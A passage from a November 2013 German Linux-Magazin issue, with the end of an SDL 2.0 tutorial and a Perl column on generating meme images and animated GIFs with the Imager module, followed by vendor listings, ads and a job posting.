noch einmal ändern kann.
Endreinigung
Zum Schluss gilt es, noch etwas aufzuräumen.
So sollte der Entwickler den
von der Textur belegten Speicher wieder
freigeben, den Renderer und das Fenster
zerstören sowie die SDL noch einmal
feucht durchwischen lassen:
Die Entwickler empfehlen daher, möglichst
die Kommentare in den Headerdateien
als Referenz zu nutzen.
Umsteiger von der alten Version 1.2
sollten zudem unbedingt den Migration
Guide lesen [6]. Ein gut gemachtes Tutorial
für C++-Entwickler findet sich nur
auf Github [7]. Alle anderen Anleitungen
im Internet bezogen sich zum Redaktionsschluss
noch auf die alte SDL 1.2.
Fazit
Die SDL 2.0 vereinfacht das Programmieren
plattformunabhängiger Multimedia-Anwendungen
enorm. Listing 2
läuft unverändert auf allen unterstützten
Systemen. Die neuen Funktionen, etwa
die Unterstützung von mehreren Fenstern
sowie die Grafikbeschleunigung, waren
überfällig und machen Hacks aus der
Vergangenheit überflüssig.
Wie der Begriff Simple im Namen andeutet,
ist die SDL jedoch auch weiterhin eine
Low-Level-Bibliothek. Sie soll primär den
Hardwarezugriff auf mehreren Plattformen
vereinfachen und vereinheitlichen.
Selbst die einfachen Zeichenfunktionen
für Rechtecke und Kreise haben die Entwickler
erst nach (vielfachen) Anwenderwünschen
in die neue Version aufgenommen.
Wer schnell zu Ergebnissen
kommen möchte oder Prototypen baut,
muss daher auf Spiele- oder 3-D-Engines
wie Py Game, Unity oder Ogre 3D ausweichen.
Die Entwickler haben einige
ursprünglich für SDL 2.0 geplante Funktionen
auf spätere Versionen verschoben.
Das API soll jedoch vorerst stabil bleiben,
erst für die Version 2.1 sind hier wieder
Änderungen im Gespräch.
Schwerer wiegt, dass die Version 2.0.0
noch ein paar kleinere Fehler aufweist
[8]. Trotzdem kommt die SDL 2.0 bereits
in einigen Programmen zum Einsatz und
läuft dort stabil. Wer mit der SDL Anwendungen
entwickeln möchte, sollte jetzt
nicht mehr auf die alte SDL 1.2 setzen
– ihrer Nachfolgerin gehört eindeutig die
Zukunft. (mhu)
n
Infos
[1] SDL: [http:// www. libsdl. org]
[2] Sprachanbindungen:
[http:// www. libsdl. org/ languages. php]
[3] Offizielle Hilfsbibliotheken:
[http:// hg. libsdl. org/]
[4] Liste mit Ereignissen: [http:// wiki. libsdl.​
org/ SDL_EventType? highlight=%28\
bCategoryEnum\b%29|%28CategoryEvent
s%29|%28SGEnumerations%29]
[5] Offizielles SDL-Wiki:
[http:// wiki. libsdl. org/ FrontPage]
[6] Migration Guide:
[http:// wiki. libsdl. org/ MigrationGuide]
[7] C++-Tutorial:
[http:// twinklebear. github. io/ pages/ sdl2/]
[8] Bugtracker: [https:// bugzilla. libsdl. org/​
describecomponents. cgi? product=SDL]
SDL 2.0 11/2013
Programmieren
www.linux-magazin.de
99
SDL_DestroyTexture(textur);
SDL_DestroyRenderer(renderer);
SDL_DestroyWindow(fenster);
SDL_Quit();
Das damit komplette Programm zeigt
noch einmal Listing 2. Um die Übersichtlichkeit
zu erhöhen, fängt es nur bei der
Initialisierung einen Fehler ab. Übersetzt
ist es schnell via:
gcc ‐Wall ‐o hallowelt hallowelt.c ‐lSDL2
Die Anwendung aus Listing 2 demonstriert
nur einen kleinen Teil der Möglichkeiten,
die die SDL bietet. Eine komplette
Beschreibung des Funktionsumfangs
würde ein ganzes Buch füllen. Leider ist
gerade die Dokumentation ein Stiefkind
der Entwickler. So bietet das offizielle
SDL-Wiki (Abbildung 6) derzeit nur eine
unvollständige Funktionsreferenz [5].
Abbildung 6: Die SDL-Entwickler suchen derzeit händeringend nach Freiwilligen, die das Wiki aktualisieren.

Programmieren
www.linux-magazin.de Perl-Snapshot 11/2013
100
Nicht nur für die Katz: Perl-maschinell erzeugte Memes
Catwalk Orange
Was harmlos mit ein paar sonderbaren Katzenbildern begann, ist zu dem Internetphänomen schlechthin angeschwollen:
Memes, mit Witztexten versehene Fotos, und animierte Gag-Gifs. Kein Witz: Mit Perl lassen die sich
prima selbst bauen und individuell gestalten. Michael Schilli
© FreyaSapphire, photocase.com
liest die Originaldatei »turtle.jpg« ein, das
von mir persönlich auf Hawaii geschossene
Urlaubsfoto von einer schwimmenden
Riesenschildkröte.
Den Font Impact fand ich in meiner
Ubuntu-Distribution als ».ttf«-Datei unter
dem in Listing 1 (Zeilen 10 und 11)
angegebenen Pfad. Zweimal die Methode
»string()« aufgerufen, einmal mit der
Fuß- und einmal mit der Kopfzeile, die
Farbe mit »white« und die Fontgröße auf
60 angegeben, Anti-Aliasing für schwachbrüstige
Displays eingeschaltet und die
Ausgabedatei mit »write()« geschrieben –
fertig ist der Spitzenwitz (Abbildung 1).
Variabler Komfort
Sommerzeit, Praktikantenzeit: Wie immer
über die Sommermonate beschäftigt
mein Arbeitgeber Collegestudenten, und
wir Altgediegenen kratzen uns die kahler
werdenden Schädel ob des sonderbaren
akademischen Nachwuchses. Besonders
erstaunte in diesem Jahr der praktizierte
Praktikantenhumor: Jede Präsentation
zieren so genannte Image Macros [2]
zum Zwecke der Erheiterung, entweder
als statische Fotos oder als per Endlosschleife
animierte Gifs.
Was als „I Can Has Cheezburger“ [3] mit
knuddeligen Kätzchen – den so genannten
Lolcats – und kessen Sprüchen begann,
ist heute als „Meme“ fester Bestandteil
der netzweiten Humorkultur. Man nehme
ein ausdrucksstarkes Bild und lege einen
Online PLUS
In einem Screencast demonstriert
Michael Schilli das Beispiel: [http://​
www.linux-magazin.de/​plus/​2013/11]
orthografisch oder grammatikalisch jenseitigen
Spruch (Lolspeak) als Kopf- und
Fußzeile im Font Impact darüber – und
fertig ist der Witz (Abbildung 2).
Meme oder Mem kommt aus dem Griechischen,
„mimema“ meint dort etwas
Imitiertes, und die evolutionäre Biologie
beschreibt damit den Vorgang der sozialen
Weitergabe kultureller Werte. Im
Internet schließlich sind Memes ein sich
per Mail, Chat oder soziale Netze virenartig
verbreitendes Massenphänomen
(Abbildung 3).
Maschinell statt manuell
Mit einem Grafikprogramm wie Gimp
sind Image Macros auf konventionelle
Weise recht schnell angefertigt, aber mit
einem Perl-Skript geht es sogar von der
Kommandozeile aus. Listing 1 zeigt die
einfachste Version, die nur vorher ausgemessene
Koordinaten für die Textstrings
hart verdrahtet. Das CPAN-Modul Imager
Für variable Textstrings muss das Skript
diese dynamisch in der Mitte positionieren.
Listing 2 nimmt drei Parameter
entgegen – das zu modifizierende Bild,
die Kopf- und die Fußzeile – und macht
daraus ein Image Macro. Der Aufruf
meme‐simple turtle.jpg "ARRIVING FIRST"U
"SO NOT WORTH IT."
erzeugt die Datei »turtle‐meme.jpg«.
Hierzu definiert das Skript einen vertika-
Abbildung 1: Auf der Kommandozeile per
»meme‐first« erzeugter Zeitgeist-Witz.

len Abstand »$margin_y« von der Bildoberkante
zur Kopfzeile respektive von
der Bildunterkante zur Fußzeile. Die ab
Zeile 56 definierte Funktion »dimensions«
errechnet Breite und Höhe des mit
dem Impact-Font der Größe 60 erzeugten
Strings. Hierzu benutzt es die Methode
»bounding_box()« eines Objekts vom Typ
Imager::Font und übergibt ihm den gewünschten
String.
Zurück kommen Breite und Höhe in Pixeln,
nachdem die Funktion die unter
Umständen negative Koordinate des linken
Rands des ersten Glyphen im String
(»$neg_width«) von der Position am
rechten Ende des Strings (»$pos_width)«
subtrahiert hat. Analog verfährt sie mit
der Position am oberen (»$asc«) beziehungsweise
unteren (»desc«) Rand des
Strings. Die Werte »$global_asc« und
»$global_desc« spielen keine Rolle, da
sie sich nicht auf den aktuellen String,
sondern auf maximal mögliche Ausmaße
beliebiger Glyphen beziehen.
Die Zeilen 33 und 36 zentrieren dann
Fuß- und Kopfzeile jeweils in der Mitte
des Fotos, indem sie die mit »getwidth()«
geholte Gesamtbreite des Fotos halbieren
und die Hälfte der Stringbreite davon
subtrahieren. Heraus kommt jeweils die
erforderliche Anfangskoordinate des zentrierten
Strings als xy-Wertepaar, x läuft
dabei von links nach rechts im Bild, y
von oben nach unten.
Abbildung 2: Klassiker der Moderne – eine Lolcat
mit orthografisch bedenklichem Lolspeak.
Listing 1: »meme‐first«
01 #!/usr/local/bin/perl ‐w
02 use strict;
03 use Imager;
04
05 my $img = Imager‐>new(
06 file => "turtle.jpg" ) or
07 die Imager‐>errstr();
08
09 my $font = Imager::Font‐>new( file =>
10 "/usr/share/fonts/truetype" .
11 "/msttcorefonts/Impact.ttf" );
© Niccolò Capanti
© Sarah Charlesworth
Abbildung 3: Knorpelfisch mit Haus – typisches
Beispiel eines Image-Macro-Mem.
12
13 $img‐>string( x => 337, y => 102,
14 string => "ARRIVING FIRST",
15 font => $font, size => 60,
16 aa => 1, color => 'white' );
17
18 $img‐>string( x => 315, y => 600,
19 string => "SO NOT WORTH IT.",
20 font => $font, size => 60,
21 aa => 1, color => 'white' );
22
23 $img‐>write( file => "turtle‐meme.jpg" );
Perl-Snapshot 11/2013
Programmieren
www.linux-magazin.de
101
Listing 2: »meme‐simple«
01 #!/usr/local/bin/perl ‐w
02 use strict;
03 use Imager;
04
05 my $margin_y = 100;
06 my $font_size = 60;
07 my $font_color = "white";
08
09 my( $file, $header, $footer ) = @ARGV;
10
11 die "usage: file header footer"
12 if scalar @ARGV != 3;
13
14 my $img = Imager‐>new(
15 file => $file ) or
16 die Imager‐>errstr();
17
18 my $font = Imager::Font‐>new(
19 file =>
20 "/usr/share/fonts/truetype/" .
21 "msttcorefonts/Impact.ttf",
22 size => $font_size,
23 color => $font_color,
24 );
25
26 my( $header_w, $header_h ) =
27 dimensions( $font, $header );
28
29 my( $footer_w, $footer_h ) =
30 dimensions( $font, $footer );
31
32 my $footer_x =
33 ( $img‐>getwidth() ‐ $footer_w ) / 2;
34
35 my $header_x =
36 ( $img‐>getwidth() ‐ $header_w ) / 2;
37
38 $img‐>string(
39 x => $header_x, y => $margin_y,
40 string => $header,
41 font => $font, size => $font_size,
42 aa => 1, color => $font_color );
43
44 $img‐>string(
45 x => $footer_x,
46 y => $img‐>getheight() ‐
47 $margin_y + $footer_h,
48 string => $footer,
49 font => $font, size => $font_size,
50 aa => 1, color => $font_color );
51
52 ( my $outfile = $file ) =~ s/\./‐meme./;
53 $img‐>write( file => $outfile );
54
55 ###########################################
56 sub dimensions {
57 ###########################################
58 my( $font, $string ) = @_;
59
60 my( $neg_width, $global_desc,
61 $pos_width, $global_asc,
62 $desc, $asc,
63 ) = $font‐>bounding_box(
64 string => $string );
65
66 return $pos_width ‐ $neg_width,
67 $asc ‐ $desc;
68 }

Programmieren
www.linux-magazin.de Perl-Snapshot 11/2013
102
Abbildung 4: Aus dem Video lassen sich Frames mit dem Betrachterprogramm Eye of Gnome kopieren und als PNG-Bilder speichern.
Wie in Listing 1 fügt in Listing 2 die
Methode »string()« nun die beiden Textstrings
im vorgegebenen Font in das Bild
ein und die Methode »write()« schreibt
das Ergebnis in eine um »‐meme« am
Ende erweiterte Datei auf die Festplatte.
Laufend witzig
Noch lustiger wird’s mit animierten Kurzfilmchen.
Ein animiertes Gif-Bild lädt der
Browser in einem Rutsch vom Server und
spielt die darin enthaltenen Frames bis
zum Sankt-Nimmerleins-Tag ab, falls im
Bild das Endlos-Flag gesetzt ist. Dieses
Verfahren stammt aus dem Jahr 1987 und
erfreut sich HTML 5 zum Trotz bis heute
großer Beliebtheit, zumal es auch in Uraltbrowsern
funktioniert. Die tonlosen Videosequenzen
lassen sich problemlos in
HTML einbetten, Wikipedia-Seiten etwa
visualisieren damit Algorithmen oder das
Zusammenspiel der beweglichen Teile
mechanischer Apparaturen.
Komiker unter den Softwa re-Entwicklern
fügen Gifs in Powerpoint-Präsentationen
und Kommentarfelder zu Pull-Requests
auf Github ein. Die oft ruckelnden
Frames erinnern an Slapstick-Szenen aus
der Frühzeit des Kinos oder an tollpatschiges
„Verstehen Sie Spaß?“-Material.
01 #!/usr/local/bin/perl ‐w
02 use strict;
03 use Imager;
04
05 my @imgs = ();
06
07 for my $file_name ( @ARGV ) {
08
09 my $img = Imager‐>new( file => $file_name );
10
Listing 3: »anigif«
Übrigens ist der seit Jahrzehnten schwelende
Streit, ob man Gif wie „Giff“ oder
„Tschiff“ ausspricht, bis heute ungeklärt.
Nur die Front zwischen den Rechthabern
hat sich verhärtet [4].
Einzelne Frames strategisch aus einer
Videodatei extrahieren, dafür eignet sich
der Mplayer aufgerufen mit:
mplayer ‐vf screenshot video.avi
Während das Video läuft, drückt der User
immer dann die Taste [S], wenn er den
nächsten angezeigten Frame als PNG-
Datei sichern will. Am Ende liegen im aktuellen
Verzeichnis von »shot0000.png«
bis »shotXXXX.png« durchnummerierte
Dateien mit den geschossenen Frames
(Abbildung 4).
Damit die Gif-Datei nicht zu groß wird,
sollte bei etwa 20 Frames insgesamt
Schluss sein. Außerdem erfordern Szenen
mit viel Bewegung eine schnellere
Abfolge der Frames, damit der Betrachter
mitkommt. Dazu hämmert man während
der schnellen Szenen einfach doppelt so
häufig auf [S] als sonst.
Motiv: Schadenfreude
Als Demo dient mir ein aus meinem Hotelzimmer
an der Strandpromenade von
11 $img = $img‐>scale( xpixels => 300,
12 ypixels => 200 );
13 push @imgs, $img;
14 }
15
16 Imager‐>write_multi( {
17 file => "anim.gif",
18 type => 'gif',
19 gif_loop => 0,
20 make_colors => "mediancut" }, @imgs) or
21 die Imager‐>errstr();
Venice Beach nahe Los Angeles heraus
gefilmte Szene [5]. Darin versucht ein
Tourist verzweifelt, einen störrischen
Segway-Roller zum Vermieter zurückzuschleppen.
Schadenfreude ist bekanntlich
die schönste Freude.
Nach einem langen Drehtag zurück baut
Listing 3 die Einzelframes mit Hilfe des
Imager-Moduls zu einem animierten Gif-
Filmchen zusammen:
anigif shot*.png
Die For-Schleife in Zeile 7 iteriert über
alle auf der Kommandozeile hereingereichten
Dateinamen. Mit der in Zeile 11
gewählten Animationsgröße von 300 mal
200 Pixeln und 26 verwendeten Frames
erreicht das animierte Gif-Bild »anim.gif«
rund 1 MByte.
Die Methode »write_multi()« schreibt
die vorher mit »new()« eingelesenen
Frames als Gif-Datei auf die Festplatte.
Die notwendigen Konvertierungen der
Infos
[1] Listings zu diesem Artikel:
[ftp:// www. linux‐magazin. de/ pub/ listings/​
magazin/ 2013/ 11/ Perl]
[2] Begriff Image Macro:
[http:// en. wikipedia. org/ wiki/ Image_macro]
[3] „I Can Has Cheezburger“:
[http:// en. wikipedia. org/ wiki/ I_Can_Has_
Cheezburger]
[4] „Battle Over ’GIF’ Pronunciation Erupts“,
New York Times:
[http:// bits. blogs. nytimes. com/ 2013/ 05/​
23/ battle‐over‐gif‐pronunciation‐erupts/]
[5] Michael Schilli, „Segway FAIL“ (Video):
[http:// www. youtube. com/ watch?
v=8_EbnF9xl‐g]
[6] Animiertes Gif des „Segway FAIL“-Videos:
[http:// perlmeister. com/ anim. gif]

Bildformate erfolgen automatisch hinter
den Kulissen. Die Option »make_colors«
mittelt mit »mediancut« die Farbtabelle
zwischen den Frames und sorgt damit
für schnellere Konvertierung. Wichtig ist
es zudem, die Option »gif_loop« auf den
Wert 0 zu setzen, was den Browser dazu
veranlasst, die Sequenz nach dem Laden
des Bildes immer und immer wieder abzuspulen
(Abbildung 5).
Zwecks Perfektionierung will ich alle
Screenshots des Gif-Filmchens noch mit
Abbildung 5: Das Gif läuft im Browser
nun in einer Endlosschleife.
einer lustigen Kopfzeile versehen, den
Footer lasse ich leer. Dabei kommt das
Skript aus Listing 1 erneut zu Ehren:
for i in *.png
do
meme‐simple $i "SEGWAY FAIL" ""
done
Das abschließende Kommando »anigif
shot*‐meme.png« liest alle Dateien mit
der Endung »‐meme.png« ein und erzeugt
das animierte Gif. Abbildung 6 zeigt ein
Szenenbild des Meisterwerks.
Über dem
gesamten Filmchen
thront 100 Pixel unterhalb
des oberen
Bildran ds bewegungslos
die Überschrift mit
dem Titel, da der
String identisch in jeden
einzelnen Frame
eingebaut ist. Sie ist
weiß und im Impact-
Abbildung 6: Das animierte Gif erhält
in allen Frames eine Kopfzeile.
Witze-Font. Wer möchte, kann sich unter
[6] das animierte Bild ansehen.
Laufend Kopfarbeit
Am Schneidetisch des Internethumors
sitzend sinniere ich über weitere Gestaltungsmöglichkeiten:
Sollte ich Witze
automatisch aus Zufallstexten stanzen?
Vielleicht mit Zitaten aus dem Kinofilm-
Portal IMDB? Meine Praktikanten nächsten
Sommer würden staunen. (jk) n
Der Autor
Michael Schilli arbeitet
als Software-Engineer bei
Yahoo in Sunnyvale, Kalifornien.
In seiner seit 1997
laufenden Kolumne forscht
er jeden Monat nach praktischen
Anwendungen der Skriptsprache Perl.
Unter [mschilli@perlmeister. com] beantwortet
er gerne Fragen.
Perl-Snapshot 11/2013
Programmieren
www.linux-magazin.de
103

Service
www.linux-magazin.de IT-Profimarkt 11/2013
106
PROFI
MARKT
Sie fragen sich, wo Sie maßgeschneiderte
Linux-Systeme und kompetente
Ansprechpartner zu Open-Source-Themen
finden? Der IT-Profimarkt weist Ihnen
als zuverlässiges Nachschlagewerk
den Weg. Die hier gelisteten Unternehmen
beschäftigen Experten auf ihrem
Gebiet und bieten hochwertige Produkte
und Leistungen.
Die exakten Angebote jeder Firma entnehmen
Sie deren Homepage. Der ersten
Orientierung dienen die Kategorien
Hardware, Software, Seminaranbieter,
Systemhaus, Netzwerk/TK und Schulung/Beratung.
Der IT-Profimarkt-Eintrag
ist ein Service von Linux-Magazin
und LinuxUser.
Online-Suche
Besonders bequem finden Sie einen
Linux-Anbieter in Ihrer Nähe über die
neue Online-Umkreis-Suche unter:
[http://www.it-profimarkt.de]
Informationen
fordern Sie bitte an bei:
Medialinx AG
Anzeigenabteilung
Putzbrunner Str. 71
D-81739 München
Tel.: +49 (0)89/99 34 11-23
Fax: +49 (0)89/99 34 11-99
E-Mail: anzeigen@linux-magazin.de
IT-Profimarkt – Liste sortiert nach Postleitzahl
1 = Hardware 2 = Netzwerk/TK 3 = Systemhaus
4= Fachliteratur 4= Seminaranbieter 5 = Software 5 = Software 6 = Schulung/Beratung 6 = Firma Anschrift Telefon Web 1 2 3 4 5 6
Schlittermann internet & unix support 01099 Dresden, Tannenstr. 2 0351-80 29 98-1 www.schlittermann.de √ √ √ √
imunixx GmbH UNIX consultants
01468 Moritzburg,
Heinrich-Heine-Str. 4
0351-8 39 75-0 www.imunixx.de √ √ √ √ √
Heinlein Support GmbH 10119 Berlin, Schwedter Straße 8/​9b 030-40 50 51-0 www.heinlein-support.de √ √ √ √ √
TUXMAN Computer 10369 Berlin, Anton-Saefkow-Platz 8 030-97 60 97 73 www.tuxman.de √ √ √ √ √
Compaso GmbH 10439 Berlin, Driesener Strasse 23 030-3 26 93 30 www.compaso.de √ √ √ √ √
elego Software Solutions GmbH 13355 Berlin, Gustav-Meyer-Allee 25 030-2 34 58 69-6 www.elegosoft.com √ √ √ √
verion GmbH 16244 Altenhof, Unter den Buchen 22 e 033363-46 10-0 www.verion.de √ √ √
Logic Way GmbH 19061 Schwerin, Hagenower Str. 73 0385-3 99 34-48 www.logicway.de √ √ √ √
Sybuca GmbH 20459 Hamburg, Herrengraben 26 040-27 86 31 90 www.sybuca.de √ √ √ √ √
iTechnology GmbH 22083 Hamburg, Osterbekstrasse 90b 040-69 64 37 20 www.itechnology.de √ √ √ √
JEL Ingenieurbuero 23911 Einhaus, Hauptstr. 7 04541-89 11-71 www.jeltimer.de √
beitco - Behrens IT-Consulting 26197 Ahlhorn, Lessingstr. 27 04435-953 73 30-0 www.beitco.de √ √ √ √ √
talicom GmbH
30169 Hannover,
Calenberger Esplanade 3
0511-12 35 99-0 www.talicom.de √ √ √ √ √
teuto.net Netzdienste GmbH 33602 Bielefeld, Niedenstr. 26 0521-9 66 86-0 www.teuto.net √ √ √ √ √
MarcanT GmbH 33602 Bielefeld, Ravensberger Str. 10 G 0521-9 59 45-0 www.marcant.net √ √ √ √ √ √
LINET Services GmbH 38118 Braunschweig, Cyriaksring 10a 0531-18 05 08-0 www.linet-services.de √ √ √ √ √ √
OpenIT GmbH 40599 Düsseldorf, In der Steele 33a-41 0211-23 95 77-0 www.OpenIT.de √ √ √ √ √
Linux-Systeme GmbH 45277 Essen, Langenbergerstr. 179 0201-29 88 30 www.linux-systeme.de √ √ √ √ √
Linuxhotel GmbH 45279 Essen, Antonienallee 1 0201-85 36-600 www.linuxhotel.de √
OpenSource Training Ralf Spenneberg 48565 Steinfurt, Am Bahnhof 3-5 02552-63 87 55 www.opensource-training.de √
Intevation GmbH 49074 Osnabrück, Neuer Graben 17 0541-3 35 08-30 osnabrueck.intevation.de √ √ √ √
Sigs Datacom GmbH 53842 Troisdorf, Lindlaustraße 2c 02241-23 41-201 sigs-datacom.de √
uib gmbh 55118 Mainz, Bonifaziusplatz 1b 06131-2 75 61-0 www.uib.de √ √ √ √
LISA GmbH 55411 Bingen, Elisenhöhe 47 06721-4 99 60 www.lisa-gmbh.de √ √ √ √ √
GONICUS GmbH 59755 Arnsberg, Moehnestr. 55 02932-91 60 www.gonicus.com √ √ √ √ √
saveIP GmbH 64283 Darmstadt, Schleiermacherstr. 23 06151-66 62 66 www.saveip.de √ √ √ √ √
LAMARC EDV-Schulungen und
Beratung GmbH
65193 Wiesbaden,
Sonnenberger Straße 14
0611-26 00 23 www.lamarc.com √ √ √ √
LinuxHaus Stuttgart 70565 Stuttgart, Hessenwiesenstrasse 10 0711-2 85 19 05 www.linuxhaus.de √ √ √ √ √
Manfred Heubach EDV und
Kommunikation
73728 Esslingen, Hindenburgstr. 47 0711-4 90 49 30 www.heubach-edv.de √ √ √ √
IT-Profimarkt listet ausschließlich Unternehmen, die Leistungen rund um Linux bieten. Alle Angaben ohne Gewähr.
(S.108)

Seminare/Markt
IT-Onlinetrainings
MEDIALINX
Mit Experten lernen. IT-ACADEMY
IT-Sicherheit Grundlagen
mit Prof. Dr.
Tobias Eggendorfer,
Hochschule
Ravensburg-Weingarten
299 €
DiD you
know?
X25
www.medialinx-academy.de
1-9-Anzeige-IT-Sicherheit-Grundlagen.indd 1
02.08.2013 11:52:51 Uhr
IT-Onlinetrainings
Mit Experten lernen.
MEDIALINX
IT-ACADEMY
Einfache IMAP-Server
mit Dovecot
mit Peer Heinlein,
Heinlein Support GmbH
249 €
www.medialinx-academy.de
IT-Academy_1-9_Dovecot-Schulung.indd 1
02.08.2013 11:53:34 Uhr
IT-Onlinetrainings
Mit Experten lernen.
MEDIALINX
IT-ACADEMY
– die offiziellen Trainings
mit Marco Welter,
Zarafa Deutschland GmbH
Zarafa Administrator
249 €
Zarafa Engineer
249 €
www.medialinx-academy.de
WusstEn siE’s?
Linux-Magazin und LinuxUser
haben ein englisches
Schwester magazin!
Am besten, Sie informieren gleich
Ihre Linux-Freunde in aller Welt...
www.linux-magazine.com
IT-Onlinetrainings
Mit Experten lernen.
MEDIALINX
IT-ACADEMY
Effiziente BASH-Skripte
mit Klaus Knopper,
Gründer der
Knoppix-Distribution,
KNOPPER.NET
199 €
Automatisieren Sie komplexe
Aufgaben mit Hilfe effizienter Skripte!
www.medialinx-academy.de
IT-Academy_1-9_Zarafa-Schulung.indd 1
02.08.2013 11:55:03 Uhr
IT-Academy_1-9_Bash-Schulung.indd 1
02.08.2013 11:53:16 Uhr
LMI_3-9h_german_1609-2013.indd 1
16.09.2013 16:53:45 Uhr

Service
www.linux-magazin.de Markt 11/2013
108
IT-Profimarkt/Markt/Stellen
IT-Profimarkt – Liste sortiert nach Postleitzahl (Fortsetzung von S. 106)
Firma Anschrift Telefon Web 1 2 3 4 5 6
Waldmann EDV Systeme + Service
74321 Bietigheim-Bissingen,
Pleidelsheimer Str. 25
07142-2 15 16 www.waldmann-edv.de √ √ √ √ √
in-put Das Linux-Systemhaus 76133 Karlsruhe, Moltkestr. 49 0721-6 80 32 88-0 www.in-put.de √ √ √ √ √ √
Bodenseo 78224 Singen, Pomeziastr. 9 07731-1 47 61 20 www.bodenseo.de √ √ √
Linux Information Systems AG 81739 München, Putzbrunnerstr. 71 089-99 34 12-0 www.linux-ag.com √ √ √ √ √
LinuxLand International GmbH 81739 München, Putzbrunnerstr. 71 089-99 34 14 41 www.linuxland.de √ √ √ √ √ √
Synergy Systems GmbH 81829 München, Konrad-Zuse-Platz 8 089-89 08 05 00 www.synergysystems.de √ √ √ √ √
B1 Systems GmbH 85088 Vohburg, Osterfeldstrasse 7 08457-93 10 96 www.b1-systems.de √ √ √ √ √
ATIX AG 85716 Unterschleißheim, Einsteinstr. 10 089-45 23 53 8-0 www.atix.de √ √ √ √ √ √
Tuxedo Computers GmbH 86343 Königsbrunn , Zeppelinstr. 3 0921-16 49 87 87-0 www.linux-onlineshop.de √ √ √ √
OSTC Open Source Training and
Consulting GmbH
90425 Nürnberg,
Waldemar-Klink-Str. 10
0911-3474544 www.ostc.de √ √ √ √ √ √
Dipl.-Ing. Christoph Stockmayer GmbH 90571 Schwaig, Dreihöhenstr. 1 0911-50 52 41 www.stockmayer.de √ √ √
pascom - Netzwerktechnik GmbH & Co.KG 94469 Deggendorf, Berger Str. 42 0991-27 00 60 www.pascom.net √ √ √ √ √
RealStuff Informatik AG CH-3007 Bern, Chutzenstrasse 24 0041-31-3 82 44 44 www.realstuff.ch √ √ √
CATATEC CH-3013 Bern, Dammweg 43 0041-31-3 30 26 30 www.catatec.ch √ √ √
Syscon Systemberatungs AG CH-8003 Zürich, Zweierstrasse 129 0041-44-4 54 20 10 www.syscon.ch √ √ √ √ √
Würth Phoenix GmbH IT-39100 Bozen, Kravoglstraße 4 0039 0471 56 41 11 www.wuerth-phoenix.com √ √ √ √
IT-Profimarkt listet ausschließlich Unternehmen, die Leistungen rund um Linux bieten. Alle Angaben ohne Gewähr.
n
3 AusgAben für nur 5,90 E
Jetzt bestellen: 3 Hefte zum Preis von einem. Sie sparen 66 %!
Neu!
Kennenlernangebot:
3 AusgAben
für nur 5,90 E
Jetzt bestellen unter:
www.android–user.de/miniabo
Telefon 07131 / 2707 274 • Fax 07131 / 2707 78 601 • E-Mail: abo@android-user.de

MAGAZIN
ONLINE
Linux-Magazin newsLetter
Nachrichten rund um die Themen Linux und Open Source lesen Sie täglich
im Newsletter des Linux-Magazins.
Newsletter
informativ
kompakt
tagesaktuell
www.linux-magazin.de/newsletter

ADMIN und Linux-Magazin
am Apple Newsstand!
Jetzt NEU!
Alternativ finden Sie alle Titel der Medialinx AG
auch bei: PagePlace, iKiosk, OnlineKiosk und
Leserauskunft Jetzt GRATIS testen!
LM_1-2q_apple-newsstand.indd 1
Digitales aBO
linuxUser: Das Monatsmagazin für die Praxis
28.08.2013 11:21:14 Uhr
DigisUB *
nur 60, 60 €
im Jahr (12 PDFs)
* Digitales Abo, jederzeit kündbar
Jetzt Bestellen Unter:
www.linux-user.de/digisub
Telefon: 07131 /2707 274
Fax: 07131 / 2707 78 601
E-Mail: abo@linux-user.de

Markt/Stellen
Kernel Developer (m/w) Network
Arbeitsort: Karlsruhe
Sie arbeiten innerhalb der Network Security Group
an unserem Unified Threat Management Produkt,
einer x86 Linux-basierten Network Appliance.
Ihre Aufgaben:
Integration aktueller Linux-Kernel-Versionen
Weiterentwicklung interner Kernel-Anpassungen
Portierung und Integration von Patches
Debugging auf Kernel- und Systemebene
Tatkräftige Unterstützung beim Aufbau und der
Pflege des internen technischen Knowhows
Ihr Profil:
Sehr gute Kenntnisse im Bereich Linux-Kernel-Entwicklung
Erfahrung mit Hardware-Treibern, I/O und Prozessoren
(32/64 Bit, SMP)
Kenntnisse im Bereich Netzwerke, TCP/IP und Netfilter
Sehr gute Kenntnisse in der Programmiersprache C und
Shell-Programmierung (bash)
Erfahrung im Umgang mit den Werkzeugen gcc, gdb,
patch/diff, make und git
Selbstständiges Planen, Arbeiten und Reporten,
auch in englischer Sprache
Verständnis des „Open Source“-Gedankens
Sophos – bei uns sind Sie von Anfang an gefragt
Verwirklichen Sie Ihre Ideen in einem globalen, erfolgreichen
Unternehmen. Übernehmen Sie Verantwortung für
unser anspruchsvolles Ziel: Gemeinsam schaffen wir die
Voraussetzung für die Informationstechnologie von morgen.
Wollen Sie mit Sicherheit Karriere machen?
Senden Sie uns Ihre vollständigen Unterlagen per Mail
mit Angabe Ihrer Gehaltsvorstellung und der Kennziffer
LM13KAR621 an: careers@sophos.de
Haben Sie noch Fragen?
Sabrina Benz, HR Business Partner, +49 721 25516 0
Sophos Technology GmbH
Amalienbadstr. 41/Bau 52, 76227 Karlsruhe
www.sophos.com

Service
www.linux-magazin.de Inserenten 11/2013
112
Inserentenverzeichnis
1&1 Internet AG http://​www.einsundeins.de 11
ADMIN http://​www.admin-magazin.de 83, 87
Android User GY http://​www.android-user.de 108
B1 Systems GmbH http://​www.b1-systems.de 115
CANDAN THE WEB COMPANY http://​www.canhost.de 65
Deutsche Python Konferenz - PyCon http://​de.pycon.org/​ 69
embedded projects GmbH http://​www.embedded-projects.net 111
Fernschule Weber GmbH http://​www.fernschule-weber.de 107
Heinlein Support GmbH http://​www.heinlein-support.de 43, 57
Host Europe GmbH http://​www.hosteurope.de 2
Ico Innovative Computer GmbH http://​www.ico.de 41
Linux Magazine http://www.linux-magazine.com 107
Linux-Hotel http://​www.linuxhotel.de 17
Linux-Magazin http://​www.linux-magazin.de 27, 110
Linux-Magazin Online http://​www.linux-magazin.de 109
LinuxUser http://​www.linuxuser.de 71, 110
MailStore Software GmbH http://www.mailstore.com 15
Medialinx IT-Academy http://​www.medialinx-academy.de 19,
103, 107
Netways GmbH http://​www.netways.de 85
Nine Internet Solutions AG http://​www.nine.ch 109
Open Source Press GmbH http://​www.opensourcepress.de 25
OpenRheinRuhr http://​www.openrheinruhr.de 31
PlusServer AG http://​www.plusserver.de 44, 47, 61, 63,
93, 104
Raspberry Pi Geek http://​www.raspberry-pi-geek.de 33
Sophos http://​http:www.sophos.com 111
Spenneberg Training & Consulting http://​www.spenneberg.com 107
